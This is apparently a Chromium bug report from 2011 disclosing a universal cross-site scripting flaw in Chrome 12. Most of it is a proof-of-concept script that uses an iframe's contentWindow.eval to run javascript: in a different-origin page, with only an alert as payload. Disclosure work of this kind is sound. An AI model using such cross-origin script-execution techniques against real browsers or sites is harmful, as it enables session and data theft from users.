Universal XSS using contentWindow.eval

May 24 2011

VULNERABILITY DETAILS

PoC:

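```html
<script>
  // Create an iframe and use eval() to construct a function in the context of its window.
  i = document.body.appendChild(document.createElement("iframe"));
  f = i.contentWindow.eval('(function(){location="javascript:alert(location)"})');
  // Navigating the iframe turns its window into a different-origin window.
  i.src = "http://google.com";
  // The function constructed earlier runs as the iframe's load handler.
  i.onload = f;
</script>
```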

From comment #30 in bug 83096 (access to this bug is restricted): it becomes a different-origin window after `eval()` is called. `eval()` is used to construct a function with the context of that window.

VERSION

Chrome: Version 12

Link: https://bugs.chromium.org/p/chromium/issues/detail?id=83743